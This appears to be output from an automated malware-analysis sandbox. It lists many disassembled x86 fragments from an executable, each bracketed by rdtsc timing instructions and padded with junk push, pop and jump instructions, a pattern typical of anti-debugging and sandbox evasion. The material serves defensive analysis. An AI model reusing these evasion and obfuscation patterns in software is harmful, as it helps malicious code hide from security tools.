Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B08CE second address: 70B0980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ecx, 2E9457B1h 0x00000013 mov bx, ax 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007FDAC0B0C809h 0x0000001d pop esi 0x0000001e popad 0x0000001f mov dword ptr [esi+3Ch], eax 0x00000022 pushad 0x00000023 pushad 0x00000024 mov eax, ebx 0x00000026 push edi 0x00000027 pop eax 0x00000028 popad 0x00000029 mov ecx, ebx 0x0000002b popad 0x0000002c mov eax, dword ptr [ebx+20h] 0x0000002f jmp 00007FDAC0B0C7FDh 0x00000034 mov dword ptr [esi+40h], eax 0x00000037 jmp 00007FDAC0B0C7FEh 0x0000003c lea eax, dword ptr [ebx+00000080h] 0x00000042 jmp 00007FDAC0B0C800h 0x00000047 push 00000001h 0x00000049 jmp 00007FDAC0B0C800h 0x0000004e nop 0x0000004f jmp 00007FDAC0B0C800h 0x00000054 push eax 0x00000055 pushad 0x00000056 push ebx 0x00000057 mov ecx, 65897E33h 0x0000005c pop ecx 0x0000005d mov bh, 01h 0x0000005f popad 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0980 second address: 70B0988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, cx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0988 second address: 70B09FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDAC0B0C7FBh 0x00000009 sub ax, E34Eh 0x0000000e jmp 00007FDAC0B0C809h 0x00000013 popfd 0x00000014 call 00007FDAC0B0C800h 0x00000019 pop eax 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 jmp 00007FDAC0B0C801h 0x00000025 nop 0x00000026 jmp 00007FDAC0B0C7FEh 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FDAC0B0C7FEh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B09FE second address: 70B0A13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0A73 second address: 70B0A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC0B0C808h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0A8F second address: 70B0AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b call 00007FDAC110B28Dh 0x00000010 movzx eax, dx 0x00000013 pop ebx 0x00000014 mov eax, 7466FE69h 0x00000019 popad 0x0000001a test edi, edi 0x0000001c jmp 00007FDAC110B294h 0x00000021 js 00007FDB2EE59E82h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a movsx edi, si 0x0000002d push eax 0x0000002e pop edx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0AD6 second address: 70B0B56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebp-0Ch] 0x0000000d jmp 00007FDAC0B0C809h 0x00000012 mov dword ptr [esi+04h], eax 0x00000015 jmp 00007FDAC0B0C7FEh 0x0000001a lea eax, dword ptr [ebx+78h] 0x0000001d jmp 00007FDAC0B0C800h 0x00000022 push 00000001h 0x00000024 jmp 00007FDAC0B0C800h 0x00000029 nop 0x0000002a jmp 00007FDAC0B0C800h 0x0000002f push eax 0x00000030 jmp 00007FDAC0B0C7FBh 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0B56 second address: 70B0B5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0B5A second address: 70B0B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0B60 second address: 70B0B90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c jmp 00007FDAC110B290h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FDAC110B28Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0B90 second address: 70B0B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0B94 second address: 70B0B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0B9A second address: 70B0C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 4A715063h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 pushfd 0x00000013 jmp 00007FDAC0B0C801h 0x00000018 sub cx, A166h 0x0000001d jmp 00007FDAC0B0C801h 0x00000022 popfd 0x00000023 popad 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FDAC0B0C803h 0x0000002e add eax, 5FAB6C9Eh 0x00000034 jmp 00007FDAC0B0C809h 0x00000039 popfd 0x0000003a mov ch, 28h 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0C11 second address: 70B0C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0C17 second address: 70B0C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0D0B second address: 70B0D14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, E89Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0D14 second address: 70B0D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esi+08h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDAC0B0C7FAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0D2C second address: 70B0D30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0D30 second address: 70B0D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0D36 second address: 70B0D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c pushad 0x0000000d mov ecx, 6B8A8F4Dh 0x00000012 mov dx, ax 0x00000015 popad 0x00000016 push 00000001h 0x00000018 jmp 00007FDAC110B294h 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0D72 second address: 70B0D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0D76 second address: 70B0D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0D7A second address: 70B0D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0D80 second address: 70B0DA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, 3BC30F0Eh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0DA2 second address: 70B0DA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0DA7 second address: 70B0E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDAC110B290h 0x0000000a or ecx, 506D0658h 0x00000010 jmp 00007FDAC110B28Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 nop 0x0000001a jmp 00007FDAC110B296h 0x0000001f lea eax, dword ptr [ebp-18h] 0x00000022 jmp 00007FDAC110B290h 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FDAC110B297h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0EF4 second address: 70B0F3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDAC0B0C807h 0x00000008 pop esi 0x00000009 mov si, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [ebp-14h] 0x00000012 jmp 00007FDAC0B0C7FBh 0x00000017 mov ecx, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FDAC0B0C805h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0F3C second address: 70B0F8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c jmp 00007FDAC110B28Eh 0x00000011 mov edx, 74E806ECh 0x00000016 jmp 00007FDAC110B290h 0x0000001b sub eax, eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007FDAC110B28Ah 0x00000025 pop ecx 0x00000026 mov esi, edi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0F8A second address: 70B103D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d pushad 0x0000000e call 00007FDAC0B0C7FEh 0x00000013 movzx eax, bx 0x00000016 pop edx 0x00000017 pushfd 0x00000018 jmp 00007FDAC0B0C7FCh 0x0000001d sbb esi, 2BFFD468h 0x00000023 jmp 00007FDAC0B0C7FBh 0x00000028 popfd 0x00000029 popad 0x0000002a pop edi 0x0000002b jmp 00007FDAC0B0C806h 0x00000030 test eax, eax 0x00000032 jmp 00007FDAC0B0C800h 0x00000037 jne 00007FDB2E85AED8h 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007FDAC0B0C7FEh 0x00000044 xor eax, 23542928h 0x0000004a jmp 00007FDAC0B0C7FBh 0x0000004f popfd 0x00000050 mov cx, 8E1Fh 0x00000054 popad 0x00000055 mov edx, dword ptr [ebp+08h] 0x00000058 pushad 0x00000059 mov ah, 22h 0x0000005b mov esi, ebx 0x0000005d popad 0x0000005e mov eax, dword ptr [esi] 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 mov si, BF07h 0x00000067 mov di, si 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B103D second address: 70B109A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b pushad 0x0000000c movzx esi, dx 0x0000000f mov si, dx 0x00000012 popad 0x00000013 mov eax, dword ptr [esi+04h] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FDAC110B28Ah 0x0000001d sbb al, 00000018h 0x00000020 jmp 00007FDAC110B28Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [edx+04h], eax 0x0000002a jmp 00007FDAC110B296h 0x0000002f mov eax, dword ptr [esi+08h] 0x00000032 pushad 0x00000033 mov cl, A2h 0x00000035 mov esi, edx 0x00000037 popad 0x00000038 mov dword ptr [edx+08h], eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B109A second address: 70B109E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B109E second address: 70B10A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B10A4 second address: 70B111C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C809h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c pushad 0x0000000d push esi 0x0000000e pushfd 0x0000000f jmp 00007FDAC0B0C803h 0x00000014 xor si, E54Eh 0x00000019 jmp 00007FDAC0B0C809h 0x0000001e popfd 0x0000001f pop eax 0x00000020 mov ebx, 2623E844h 0x00000025 popad 0x00000026 mov dword ptr [edx+0Ch], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FDAC0B0C805h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B111C second address: 70B1122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1122 second address: 70B1139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC0B0C803h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1139 second address: 70B11A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FDAC110B293h 0x00000017 sub si, FACEh 0x0000001c jmp 00007FDAC110B299h 0x00000021 popfd 0x00000022 call 00007FDAC110B290h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B11A3 second address: 70B11D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C800h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c jmp 00007FDAC0B0C800h 0x00000011 mov eax, dword ptr [esi+14h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B11D3 second address: 70B11D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B11D7 second address: 70B11DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B11DD second address: 70B1206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDAC110B28Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1206 second address: 70B1215 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1215 second address: 70B123A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+18h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B123A second address: 70B123E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B123E second address: 70B12B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDAC110B294h 0x0000000b popad 0x0000000c mov dword ptr [edx+18h], eax 0x0000000f pushad 0x00000010 mov ebx, ecx 0x00000012 popad 0x00000013 mov eax, dword ptr [esi+1Ch] 0x00000016 pushad 0x00000017 mov bx, CF28h 0x0000001b popad 0x0000001c mov dword ptr [edx+1Ch], eax 0x0000001f jmp 00007FDAC110B293h 0x00000024 mov eax, dword ptr [esi+20h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov cx, di 0x0000002d pushfd 0x0000002e jmp 00007FDAC110B297h 0x00000033 jmp 00007FDAC110B293h 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B12B5 second address: 70B12BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B12BB second address: 70B12E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+20h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDAC110B295h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B12E6 second address: 70B12F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC0B0C7FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B12F6 second address: 70B1324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+24h] 0x0000000b jmp 00007FDAC110B297h 0x00000010 mov dword ptr [edx+24h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movsx edi, ax 0x00000019 push ecx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1324 second address: 70B138F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C809h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+28h] 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 mov eax, 1DC1175Fh 0x00000015 popad 0x00000016 mov dword ptr [edx+28h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FDAC0B0C807h 0x00000022 sbb eax, 0BAA695Eh 0x00000028 jmp 00007FDAC0B0C809h 0x0000002d popfd 0x0000002e push ecx 0x0000002f pop edx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B138F second address: 70B13A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov al, DCh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B13A9 second address: 70B13E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C800h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c jmp 00007FDAC0B0C800h 0x00000011 mov ax, word ptr [esi+30h] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDAC0B0C7FCh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B13E3 second address: 70B1406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 0636DEADh 0x00000009 popad 0x0000000a mov word ptr [edx+30h], ax 0x0000000e pushad 0x0000000f mov ecx, 04823665h 0x00000014 push eax 0x00000015 mov dh, 31h 0x00000017 pop ecx 0x00000018 popad 0x00000019 mov ax, word ptr [esi+32h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1406 second address: 70B140A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B140A second address: 70B140E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B140E second address: 70B1414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1414 second address: 70B1419 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1419 second address: 70B1438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 2FBCh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+32h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDAC0B0C7FEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1438 second address: 70B143E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B143E second address: 70B1442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1442 second address: 70B146F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+34h] 0x0000000e jmp 00007FDAC110B28Eh 0x00000013 mov dword ptr [edx+34h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B146F second address: 70B1473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1473 second address: 70B1479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1479 second address: 70B149D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C804h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B149D second address: 70B14A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B14A3 second address: 70B14EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C804h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FDB2E85AA52h 0x0000000f jmp 00007FDAC0B0C800h 0x00000014 or dword ptr [edx+38h], FFFFFFFFh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDAC0B0C807h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B14EE second address: 70B14F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B14F3 second address: 70B1507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 144CA788h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c or dword ptr [edx+3Ch], FFFFFFFFh 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
